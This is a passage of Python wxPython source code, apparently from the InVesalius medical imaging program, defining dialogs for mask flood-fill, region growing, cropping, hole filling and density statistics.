        """Propagate the multiplier value to the config."""
        self.config.confid_mult = self.spin_mult.GetValue()
    def OnSetIters(self, evt):
        """Propagate the iteration count to the config."""
        self.config.confid_iters = self.spin_iters.GetValue()
class PanelFFillProgress(wx.Panel):
    """Indeterminate progress gauge plus an elapsed-time label, shown while a
    flood-fill operation runs.

    Call StartTimer() when the operation begins, Pulse() periodically while it
    runs, and StopTimer() when it finishes.
    """

    # strftime format for the elapsed-time label.
    _TIME_FMT = "%H:%M:%S"

    def __init__(self, parent, ID=-1, style=wx.TAB_TRAVERSAL|wx.NO_BORDER):
        wx.Panel.__init__(self, parent, ID, style=style)
        # Initialise the reference time so Pulse()/StopTimer() are safe even
        # if called before StartTimer() (previously raised AttributeError).
        self.t0 = time.time()
        self._init_gui()
    def _init_gui(self):
        """Build the gauge and the caption/elapsed-time labels."""
        self.progress = wx.Gauge(self, -1)
        self.lbl_progress_caption = wx.StaticText(self, -1, _("Elapsed time:"))
        self.lbl_time = wx.StaticText(self, -1, _("00:00:00"))
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(self.progress, 0, wx.EXPAND | wx.ALL, 5)
        time_sizer = wx.BoxSizer(wx.HORIZONTAL)
        time_sizer.Add(self.lbl_progress_caption, 0, wx.EXPAND, 0)
        time_sizer.Add(self.lbl_time, 1, wx.EXPAND | wx.LEFT, 5)
        main_sizer.Add(time_sizer, 0, wx.EXPAND | wx.ALL, 5)
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        main_sizer.SetSizeHints(self)
    def _update_elapsed_label(self):
        """Refresh the elapsed-time label from the reference time ``t0``."""
        elapsed = time.gmtime(time.time() - self.t0)
        self.lbl_time.SetLabel(time.strftime(self._TIME_FMT, elapsed))
    def StartTimer(self):
        """Mark the start of the operation."""
        self.t0 = time.time()
    def StopTimer(self):
        """Show the final elapsed time and reset the gauge."""
        self._update_elapsed_label()
        self.progress.SetValue(0)
    def Pulse(self):
        """Update the elapsed time and pulse the indeterminate gauge."""
        self._update_elapsed_label()
        self.progress.Pulse()
class FFillOptionsDialog(wx.Dialog):
    """Floating dialog with the mask flood-fill options: target (2D slice or
    3D volume) and the 2D/3D connectivity, all mirrored into ``config``.

    Closing the dialog disables the mask flood-fill interaction style.
    """
    def __init__(self, title, config):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self.config = config
        self._init_gui()
    def _init_gui(self):
        """
        Create the widgets, initialised from the current config values.
        """
        # Target
        if sys.platform == "win32":
            border_style = wx.SIMPLE_BORDER
        else:
            border_style = wx.SUNKEN_BORDER
        self.panel_target = PanelTargeFFill(self, style=border_style|wx.TAB_TRAVERSAL)
        self.panel2dcon = Panel2DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
        self.panel3dcon = Panel3DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
        # Only the connectivity panel matching the target is enabled.
        if self.config.target == "2D":
            self.panel_target.target_2d.SetValue(1)
            self.panel2dcon.Enable(1)
            self.panel3dcon.Enable(0)
        else:
            self.panel_target.target_3d.SetValue(1)
            self.panel3dcon.Enable(1)
            self.panel2dcon.Enable(0)
        # Connectivity 2D
        if self.config.con_2d == 8:
            self.panel2dcon.conect2D_8.SetValue(1)
        else:
            self.panel2dcon.conect2D_4.SetValue(1)
            self.config.con_2d = 4
        # Connectivity 3D
        if self.config.con_3d == 18:
            self.panel3dcon.conect3D_18.SetValue(1)
        elif self.config.con_3d == 26:
            self.panel3dcon.conect3D_26.SetValue(1)
        else:
            self.panel3dcon.conect3D_6.SetValue(1)
        self.close_btn = wx.Button(self, wx.ID_CLOSE)
        # Sizer
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, -1, _(u"Parameters")), flag=wx.LEFT, border=5)
        sizer.AddSpacer(5)
        sizer.Add(self.panel_target, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        sizer.Add(self.panel2dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        sizer.Add(self.panel3dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        sizer.Add(self.close_btn, 0, flag=wx.ALIGN_RIGHT|wx.RIGHT, border=7)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.close_btn.Bind(wx.EVT_BUTTON, self.OnBtnClose)
        # One handler for every radio button in the dialog.
        self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
    def OnBtnClose(self, evt):
        self.Close()
    def OnSetRadio(self, evt):
        """Mirror every radio-button selection into the config."""
        # Target
        if self.panel_target.target_2d.GetValue():
            self.config.target = "2D"
            self.panel2dcon.Enable(1)
            self.panel3dcon.Enable(0)
        else:
            self.config.target = "3D"
            self.panel3dcon.Enable(1)
            self.panel2dcon.Enable(0)
        # 2D
        if self.panel2dcon.conect2D_4.GetValue():
            self.config.con_2d = 4
        elif self.panel2dcon.conect2D_8.GetValue():
            self.config.con_2d = 8
        # 3D
        if self.panel3dcon.conect3D_6.GetValue():
            self.config.con_3d = 6
        elif self.panel3dcon.conect3D_18.GetValue():
            self.config.con_3d = 18
        elif self.panel3dcon.conect3D_26.GetValue():
            self.config.con_3d = 26
    def OnClose(self, evt):
        """Turn off the flood-fill style (if still active) and destroy."""
        if self.config.dlg_visible:
            Publisher.sendMessage('Disable style', style=const.SLICE_STATE_MASK_FFILL)
        evt.Skip()
        self.Destroy()
class SelectPartsOptionsDialog(wx.Dialog):
    """Floating dialog to select connected mask parts: the target mask name
    and the 3D connectivity, mirrored into ``config``.

    Closing the dialog disables the select-mask-parts interaction style.
    """
    def __init__(self, config):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Select mask parts"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self.config = config
        self.SetReturnCode(wx.CANCEL)
        self._init_gui()
    def _init_gui(self):
        """Build the name field, 3D-connectivity panel and OK/Cancel buttons,
        initialised from the current config."""
        self.target_name = wx.TextCtrl(self, -1)
        self.target_name.SetValue(self.config.mask_name)
        # Connectivity 3D
        self.panel3dcon = Panel3DConnectivity(self)
        if self.config.con_3d == 18:
            self.panel3dcon.conect3D_18.SetValue(1)
        elif self.config.con_3d == 26:
            self.panel3dcon.conect3D_26.SetValue(1)
        else:
            self.panel3dcon.conect3D_6.SetValue(1)
        self.btn_ok = wx.Button(self, wx.ID_OK)
        self.btn_cancel = wx.Button(self, wx.ID_CANCEL)
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, -1, _(u"Target mask name")), flag=wx.LEFT, border=5)
        sizer.AddSpacer(5)
        sizer.Add(self.target_name, flag=wx.LEFT|wx.EXPAND|wx.RIGHT, border=9)
        sizer.AddSpacer(5)
        sizer.Add(self.panel3dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND)
        sizer.AddSpacer(5)
        btn_sizer = wx.BoxSizer(wx.HORIZONTAL)
        btn_sizer.Add(self.btn_ok, 0)# flag=wx.ALIGN_RIGHT, border=5)
        btn_sizer.Add(self.btn_cancel, 0, flag=wx.LEFT, border=5)
        sizer.Add(btn_sizer, 0, flag=wx.ALIGN_RIGHT|wx.LEFT|wx.RIGHT, border=5)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
        self.btn_cancel.Bind(wx.EVT_BUTTON, self.OnCancel)
        self.target_name.Bind(wx.EVT_CHAR, self.OnChar)
        self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
    def OnOk(self, evt):
        """Accept: record wx.OK and close (cleanup happens in OnClose)."""
        self.SetReturnCode(wx.OK)
        self.Close()
    def OnCancel(self, evt):
        """Reject: record wx.CANCEL and close (cleanup happens in OnClose)."""
        self.SetReturnCode(wx.CANCEL)
        self.Close()
    def OnChar(self, evt):
        """Mirror the (pre-keystroke) text into config.mask_name."""
        evt.Skip()
        self.config.mask_name = self.target_name.GetValue()
    def OnSetRadio(self, evt):
        """Mirror the 3D-connectivity selection into the config."""
        if self.panel3dcon.conect3D_6.GetValue():
            self.config.con_3d = 6
        elif self.panel3dcon.conect3D_18.GetValue():
            self.config.con_3d = 18
        elif self.panel3dcon.conect3D_26.GetValue():
            self.config.con_3d = 26
    def OnClose(self, evt):
        """Turn off the select-mask-parts style (if still active) and destroy."""
        if self.config.dlg_visible:
            Publisher.sendMessage('Disable style', style=const.SLICE_STATE_SELECT_MASK_PARTS)
        evt.Skip()
        self.Destroy()
class FFillSegmentationOptionsDialog(wx.Dialog):
    """Floating dialog with the region-growing segmentation options: target,
    2D/3D connectivity, growing method (dynamic/threshold/confidence) with its
    method-specific panel, and a progress panel. All choices are mirrored into
    ``config``.

    Closing the dialog disables the mask flood-fill interaction style.
    """
    def __init__(self, config, ID=-1, title=_(u"Region growing"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
        self.config = config
        self._init_gui()
    def _init_gui(self):
        """
        Create the widgets, initialised from the current config values.
        """
        import invesalius.project as prj
        # Target
        if sys.platform == "win32":
            border_style = wx.SIMPLE_BORDER
        else:
            border_style = wx.SUNKEN_BORDER
        self.panel_target = PanelTargeFFill(self, style=border_style|wx.TAB_TRAVERSAL)
        self.panel2dcon = Panel2DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
        self.panel3dcon = Panel3DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
        # Only the connectivity panel matching the target is enabled.
        if self.config.target == "2D":
            self.panel_target.target_2d.SetValue(1)
            self.panel2dcon.Enable(1)
            self.panel3dcon.Enable(0)
        else:
            self.panel_target.target_3d.SetValue(1)
            self.panel3dcon.Enable(1)
            self.panel2dcon.Enable(0)
        # Connectivity 2D
        if self.config.con_2d == 8:
            self.panel2dcon.conect2D_8.SetValue(1)
        else:
            self.panel2dcon.conect2D_4.SetValue(1)
            self.config.con_2d = 4
        # Connectivity 3D
        if self.config.con_3d == 18:
            self.panel3dcon.conect3D_18.SetValue(1)
        elif self.config.con_3d == 26:
            self.panel3dcon.conect3D_26.SetValue(1)
        else:
            self.panel3dcon.conect3D_6.SetValue(1)
        self.cmb_method = wx.ComboBox(self, -1, choices=(_(u"Dynamic"), _(u"Threshold"), _(u"Confidence")), style=wx.CB_READONLY)
        if self.config.method == 'dynamic':
            self.cmb_method.SetSelection(0)
        elif self.config.method == 'threshold':
            self.cmb_method.SetSelection(1)
        elif self.config.method == 'confidence':
            self.cmb_method.SetSelection(2)
        # All three method panels are created; only the active one is shown,
        # and OnSetMethod swaps them in the sizer slot at position (11, 0).
        self.panel_ffill_threshold = PanelFFillThreshold(self, self.config, -1, style=border_style|wx.TAB_TRAVERSAL)
        self.panel_ffill_threshold.SetMinSize((250, -1))
        self.panel_ffill_threshold.Hide()
        self.panel_ffill_dynamic = PanelFFillDynamic(self, self.config, -1, style=border_style|wx.TAB_TRAVERSAL)
        self.panel_ffill_dynamic.SetMinSize((250, -1))
        self.panel_ffill_dynamic.Hide()
        self.panel_ffill_confidence = PanelFFillConfidence(self, self.config, -1, style=border_style|wx.TAB_TRAVERSAL)
        self.panel_ffill_confidence.SetMinSize((250, -1))
        self.panel_ffill_confidence.Hide()
        self.panel_ffill_progress = PanelFFillProgress(self, -1, style=wx.TAB_TRAVERSAL)
        self.panel_ffill_progress.SetMinSize((250, -1))
        # self.panel_ffill_progress.Hide()
        self.close_btn = wx.Button(self, wx.ID_CLOSE)
        # Sizer
        sizer = wx.GridBagSizer(2, 2)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            sizer.Add(0, 0, (0, 0))
        except TypeError:
            sizer.AddStretchSpacer((0, 0))
        sizer.Add(wx.StaticText(self, -1, _(u"Parameters")), (1, 0), (1, 6), flag=wx.LEFT, border=5)
        try:
            sizer.Add(0, 0, (2, 0))
        except TypeError:
            sizer.AddStretchSpacer((2, 0))
        sizer.Add(self.panel_target, (3, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        try:
            sizer.Add(0, 0, (4, 0))
        except TypeError:
            sizer.AddStretchSpacer((4, 0))
        sizer.Add(self.panel2dcon, (5, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        try:
            sizer.Add(0, 0, (6, 0))
        except TypeError:
            sizer.AddStretchSpacer((6, 0))
        sizer.Add(self.panel3dcon, (7, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        try:
            sizer.Add(0, 0, (8, 0))
        except TypeError:
            sizer.AddStretchSpacer((8, 0))
        sizer.Add(wx.StaticText(self, -1, _(u"Method")), (9, 0), (1, 1), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=7)
        sizer.Add(self.cmb_method, (9, 1), (1, 5), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        try:
            sizer.Add(0, 0, (10, 0))
        except TypeError:
            sizer.AddStretchSpacer((10, 0))
        # Place the panel of the configured method at (11, 0); unknown methods
        # fall back to 'threshold'.
        if self.config.method == 'dynamic':
            self.cmb_method.SetSelection(0)
            self.panel_ffill_dynamic.Show()
            sizer.Add(self.panel_ffill_dynamic, (11, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        elif self.config.method == 'confidence':
            self.cmb_method.SetSelection(2)
            self.panel_ffill_confidence.Show()
            sizer.Add(self.panel_ffill_confidence, (11, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        else:
            self.cmb_method.SetSelection(1)
            self.panel_ffill_threshold.Show()
            sizer.Add(self.panel_ffill_threshold, (11, 0), (1, 6), flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
            self.config.method = 'threshold'
        try:
            sizer.Add(0, 0, (12, 0))
        except TypeError:
            sizer.AddStretchSpacer((12, 0))
        sizer.Add(self.panel_ffill_progress, (13, 0), (1, 6), flag=wx.ALIGN_RIGHT|wx.RIGHT, border=5)
        try:
            sizer.Add(0, 0, (14, 0))
        except TypeError:
            sizer.AddStretchSpacer((14, 0))
        sizer.Add(self.close_btn, (15, 0), (1, 6), flag=wx.ALIGN_RIGHT|wx.RIGHT, border=5)
        try:
            sizer.Add(0, 0, (16, 0))
        except TypeError:
            sizer.AddStretchSpacer((16, 0))
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
        self.cmb_method.Bind(wx.EVT_COMBOBOX, self.OnSetMethod)
        self.close_btn.Bind(wx.EVT_BUTTON, self.OnBtnClose)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
    def OnSetRadio(self, evt):
        """Mirror every radio-button selection into the config."""
        # Target
        if self.panel_target.target_2d.GetValue():
            self.config.target = "2D"
            self.panel2dcon.Enable(1)
            self.panel3dcon.Enable(0)
        else:
            self.config.target = "3D"
            self.panel3dcon.Enable(1)
            self.panel2dcon.Enable(0)
        # 2D
        if self.panel2dcon.conect2D_4.GetValue():
            self.config.con_2d = 4
        elif self.panel2dcon.conect2D_8.GetValue():
            self.config.con_2d = 8
        # 3D
        if self.panel3dcon.conect3D_6.GetValue():
            self.config.con_3d = 6
        elif self.panel3dcon.conect3D_18.GetValue():
            self.config.con_3d = 18
        elif self.panel3dcon.conect3D_26.GetValue():
            self.config.con_3d = 26
    def OnSetMethod(self, evt):
        """Swap the method-specific panel in sizer slot (11, 0) to match the
        combobox selection and update config.method."""
        item_panel = self.GetSizer().FindItemAtPosition((11, 0)).GetWindow()
        if self.cmb_method.GetSelection() == 0:
            self.config.method = 'dynamic'
            item_panel.Hide()
            self.panel_ffill_dynamic.Show()
            self.GetSizer().Replace(item_panel, self.panel_ffill_dynamic)
        elif self.cmb_method.GetSelection() == 2:
            self.config.method = 'confidence'
            item_panel.Hide()
            self.panel_ffill_confidence.Show()
            self.GetSizer().Replace(item_panel, self.panel_ffill_confidence)
        else:
            self.config.method = 'threshold'
            item_panel.Hide()
            self.panel_ffill_threshold.Show()
            self.GetSizer().Replace(item_panel, self.panel_ffill_threshold)
        self.GetSizer().Fit(self)
        self.Layout()
    def OnBtnClose(self, evt):
        self.Close()
    def OnClose(self, evt):
        """Turn off the flood-fill style (if still active) and destroy."""
        if self.config.dlg_visible:
            Publisher.sendMessage('Disable style', style=const.SLICE_STATE_MASK_FFILL)
        evt.Skip()
        self.Destroy()
class CropOptionsDialog(wx.Dialog):
    """Floating dialog showing the current crop limits (read-only) on the
    axial, sagital and coronal axes, updated via the
    'Update crop limits into gui' message. OK applies the crop; both OK and
    Cancel disable the crop-mask interaction style.
    """
    def __init__(self, config, ID=-1, title=_(u"Crop mask"), style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP):
        self.config = config
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), ID, title=title, style=style)
        self._init_gui()
    def UpdateValues(self, limits):
        """Pubsub handler: show the (xi, xf, yi, yf, zi, zf) crop limits."""
        xi, xf, yi, yf, zi, zf = limits
        self.tx_axial_i.SetValue(str(zi))
        self.tx_axial_f.SetValue(str(zf))
        self.tx_sagital_i.SetValue(str(xi))
        self.tx_sagital_f.SetValue(str(xf))
        self.tx_coronal_i.SetValue(str(yi))
        self.tx_coronal_f.SetValue(str(yf))
    def _init_gui(self):
        """Build the read-only limit fields and the OK/Cancel buttons."""
        p = wx.Panel(self, -1, style = wx.TAB_TRAVERSAL
                     | wx.CLIP_CHILDREN
                     | wx.FULL_REPAINT_ON_RESIZE)
        # NOTE(review): self.gbs is assigned twice here, so it ends up holding
        # the inner sizer, not gbs_principal — confirm this is intentional.
        gbs_principal = self.gbs = wx.GridBagSizer(4,1)
        gbs = self.gbs = wx.GridBagSizer(3, 4)
        flag_labels = wx.ALIGN_RIGHT  | wx.ALIGN_CENTER_VERTICAL
        txt_style = wx.TE_READONLY
        stx_axial = wx.StaticText(p, -1, _(u"Axial:"))
        self.tx_axial_i = tx_axial_i = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
        stx_axial_t = wx.StaticText(p, -1, _(u" - "))
        self.tx_axial_f = tx_axial_f = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
        gbs.Add(stx_axial, (0,0), flag=flag_labels)
        gbs.Add(tx_axial_i, (0,1))
        gbs.Add(stx_axial_t, (0,2), flag=flag_labels)
        gbs.Add(tx_axial_f, (0,3))
        stx_sagital = wx.StaticText(p, -1, _(u"Sagital:"))
        self.tx_sagital_i = tx_sagital_i = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
        stx_sagital_t = wx.StaticText(p, -1, _(u" - "))
        self.tx_sagital_f = tx_sagital_f = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
        gbs.Add(stx_sagital, (1,0), flag=flag_labels)
        gbs.Add(tx_sagital_i, (1,1))
        gbs.Add(stx_sagital_t, (1,2), flag=flag_labels)
        gbs.Add(tx_sagital_f, (1,3))
        stx_coronal = wx.StaticText(p, -1, _(u"Coronal:"))
        self.tx_coronal_i = tx_coronal_i = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
        stx_coronal_t = wx.StaticText(p, -1, _(u" - "))
        self.tx_coronal_f = tx_coronal_f = wx.TextCtrl(p, -1, "", size=wx.Size(50,-1), style=txt_style)
        gbs.Add(stx_coronal, (2,0), flag=flag_labels)
        gbs.Add(tx_coronal_i, (2,1))
        gbs.Add(stx_coronal_t, (2,2), flag=flag_labels)
        gbs.Add(tx_coronal_f, (2,3))
        gbs_button = wx.GridBagSizer(2, 4)
        btn_ok = self.btn_ok= wx.Button(p, wx.ID_OK)
        btn_ok.SetDefault()
        btn_cancel = wx.Button(p, wx.ID_CANCEL)
        gbs_button.Add(btn_cancel, (0,0))
        gbs_button.Add(btn_ok, (0,1))
        gbs_principal.Add(gbs, (0,0), flag = wx.ALL|wx.EXPAND)
        # Spacer API differs across wxPython versions; fall back when
        # Add(0, 0, pos) is not supported.
        try:
            gbs_principal.Add(0, 0, (1, 0))
            gbs_principal.Add(0, 0, (2, 0))
        except TypeError:
            gbs_principal.AddStretchSpacer((1, 0))
            gbs_principal.AddStretchSpacer((2, 0))
        gbs_principal.Add(gbs_button, (3,0), flag = wx.ALIGN_RIGHT)
        box = wx.BoxSizer()
        box.Add(gbs_principal, 1, wx.ALL|wx.EXPAND, 10)
        p.SetSizer(box)
        box.Fit(p)
        p.Layout()
        sizer = wx.BoxSizer()
        sizer.Add(p, 1, wx.EXPAND)
        # NOTE(review): this sizer is never set on the dialog via SetSizer;
        # sizer.Fit(self) only sizes the window — confirm this is intended.
        sizer.Fit(self)
        self.Layout()
        Publisher.subscribe(self.UpdateValues, 'Update crop limits into gui')
        btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
        btn_cancel.Bind(wx.EVT_BUTTON, self.OnClose)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
    def OnOk(self, evt):
        """Apply the crop, then disable the crop-mask style."""
        self.config.dlg_visible = False
        Publisher.sendMessage('Crop mask')
        Publisher.sendMessage('Disable style', style=const.SLICE_STATE_CROP_MASK)
        evt.Skip()
    def OnClose(self, evt):
        """Cancel: disable the crop-mask style and destroy the dialog."""
        self.config.dlg_visible = False
        Publisher.sendMessage('Disable style', style=const.SLICE_STATE_CROP_MASK)
        evt.Skip()
        self.Destroy()
class FillHolesAutoDialog(wx.Dialog):
    """Floating dialog to fill mask holes automatically: target (2D/3D),
    connectivity, orientation (2D only) and maximum hole size in voxels.
    Apply publishes the 'Fill holes automatically' message with these
    parameters.
    """
    def __init__(self, title):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self._init_gui()
    def _init_gui(self):
        """Build the target/connectivity panels, hole-size spin control and
        Apply/Close buttons. Defaults: 2D target, 4-/6-connectivity."""
        if sys.platform == "win32":
            border_style = wx.SIMPLE_BORDER
        else:
            border_style = wx.SUNKEN_BORDER
        self.spin_size = InvSpinCtrl(self, -1, value=1000, min_value=1, max_value=1000000000)
        self.panel_target = PanelTargeFFill(self, style=border_style|wx.TAB_TRAVERSAL)
        self.panel2dcon = Panel2DConnectivity(self, show_orientation=True, style=border_style|wx.TAB_TRAVERSAL)
        self.panel3dcon = Panel3DConnectivity(self, style=border_style|wx.TAB_TRAVERSAL)
        self.panel2dcon.Enable(1)
        self.panel3dcon.Enable(0)
        self.panel_target.target_2d.SetValue(1)
        self.panel2dcon.conect2D_4.SetValue(1)
        self.panel3dcon.conect3D_6.SetValue(1)
        self.apply_btn = wx.Button(self, wx.ID_APPLY)
        self.close_btn = wx.Button(self, wx.ID_CLOSE)
        # Sizer
        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.AddSpacer(5)
        sizer.Add(wx.StaticText(self, -1, _(u"Parameters")), flag=wx.LEFT, border=5)
        sizer.AddSpacer(5)
        sizer.Add(self.panel_target, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        sizer.Add(self.panel2dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        sizer.Add(self.panel3dcon, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        spin_sizer = wx.BoxSizer(wx.HORIZONTAL)
        spin_sizer.Add(wx.StaticText(self, -1, _(u"Max hole size")), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        spin_sizer.Add(self.spin_size, 0, flag=wx.LEFT|wx.RIGHT, border=5)
        spin_sizer.Add(wx.StaticText(self, -1, _(u"voxels")), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
        sizer.Add(spin_sizer, 0, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=7)
        sizer.AddSpacer(5)
        btn_sizer = wx.BoxSizer(wx.HORIZONTAL)
        btn_sizer.Add(self.apply_btn, 0)# flag=wx.ALIGN_RIGHT, border=5)
        btn_sizer.Add(self.close_btn, 0, flag=wx.LEFT, border=5)
        sizer.Add(btn_sizer, 0, flag=wx.ALIGN_RIGHT|wx.LEFT|wx.RIGHT, border=5)
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.apply_btn.Bind(wx.EVT_BUTTON, self.OnApply)
        self.close_btn.Bind(wx.EVT_BUTTON, self.OnBtnClose)
        self.Bind(wx.EVT_RADIOBUTTON, self.OnSetRadio)
    def OnApply(self, evt):
        """Publish the fill-holes request with the selected parameters."""
        if self.panel_target.target_2d.GetValue():
            target = "2D"
            conn = self.panel2dcon.GetConnSelected()
            orientation = self.panel2dcon.GetOrientation()
        else:
            target = "3D"
            conn = self.panel3dcon.GetConnSelected()
            orientation = 'VOLUME'
        parameters = {
            'target': target,
            'conn': conn,
            'orientation': orientation,
            'size': self.spin_size.GetValue(),
        }
        Publisher.sendMessage("Fill holes automatically", parameters=parameters)
    def OnBtnClose(self, evt):
        self.Close()
        self.Destroy()
    def OnSetRadio(self, evt):
        """Enable the connectivity panel matching the selected target."""
        # Target
        if self.panel_target.target_2d.GetValue():
            self.panel2dcon.Enable(1)
            self.panel3dcon.Enable(0)
        else:
            self.panel3dcon.Enable(1)
            self.panel2dcon.Enable(0)
class MaskDensityDialog(wx.Dialog):
    """Dialog that computes and shows density statistics (mean, min, max,
    standard deviation) for a selected mask.

    NOTE(review): the ``title`` parameter is accepted but unused — the dialog
    title is always the translated "Mask density"; kept for caller
    compatibility.
    """
    def __init__(self, title):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Mask density"),
                           style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT)
        self._init_gui()
        self._bind_events()
    def _init_gui(self):
        """Build the mask selector, Calculate button and read-only result fields."""
        import invesalius.project as prj
        project = prj.Project()
        self.cmb_mask = wx.ComboBox(self, -1, choices=[], style=wx.CB_READONLY)
        if project.mask_dict.values():
            for mask in project.mask_dict.values():
                self.cmb_mask.Append(mask.name, mask)
            self.cmb_mask.SetValue(list(project.mask_dict.values())[0].name)
        self.calc_button = wx.Button(self, -1, _(u'Calculate'))
        self.mean_density = self._create_selectable_label_text('')
        self.min_density = self._create_selectable_label_text('')
        self.max_density = self._create_selectable_label_text('')
        self.std_density = self._create_selectable_label_text('')
        slt_mask_sizer = wx.FlexGridSizer(rows=1, cols=3, vgap=5, hgap=5)
        slt_mask_sizer.AddMany([
            (wx.StaticText(self, -1, _(u'Mask:'), style=wx.ALIGN_CENTER_VERTICAL), 0, wx.ALIGN_CENTRE),
            (self.cmb_mask, 1, wx.EXPAND),
            (self.calc_button, 0, wx.EXPAND),
        ])
        values_sizer = wx.FlexGridSizer(rows=4, cols=2, vgap=5, hgap=5)
        values_sizer.AddMany([
            (wx.StaticText(self, -1, _(u'Mean:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
            (self.mean_density, 1, wx.EXPAND),
            (wx.StaticText(self, -1, _(u'Minimun:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
            (self.min_density, 1, wx.EXPAND),
            (wx.StaticText(self, -1, _(u'Maximun:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
            (self.max_density, 1, wx.EXPAND),
            (wx.StaticText(self, -1, _(u'Standard deviation:')), 0, wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT),
            (self.std_density, 1, wx.EXPAND),
        ])
        sizer = wx.FlexGridSizer(rows=4, cols=1, vgap=5, hgap=5)
        sizer.AddSpacer(5)
        sizer.AddMany([
            (slt_mask_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, 5) ,
            (values_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5),
        ])
        sizer.AddSpacer(5)
        self.SetSizer(sizer)
        sizer.Fit(self)
        self.Layout()
        self.CenterOnScreen()
    def _create_selectable_label_text(self, text):
        """Return a read-only TextCtrl so the user can select/copy the value."""
        label = wx.TextCtrl(self, -1, style=wx.TE_READONLY)
        label.SetValue(text)
        #  label.SetBackgroundColour(self.GetBackgroundColour())
        return label
    def _bind_events(self):
        self.calc_button.Bind(wx.EVT_BUTTON, self.OnCalcButton)
    def OnCalcButton(self, evt):
        """Compute the statistics in a worker thread while animating the
        result fields, then display min/max/mean/std."""
        from invesalius.data.slice_ import Slice
        mask = self.cmb_mask.GetClientData(self.cmb_mask.GetSelection())
        slc = Slice()
        with futures.ThreadPoolExecutor(max_workers=1) as executor:
            future = executor.submit(slc.calc_image_density, mask)
            # Spin a "Calculating ..." animation and repaint so the dialog
            # stays responsive while the worker runs.
            for c in itertools.cycle(['', '.', '..', '...']):
                s = _(u'Calculating ') + c
                self.mean_density.SetValue(s)
                self.min_density.SetValue(s)
                self.max_density.SetValue(s)
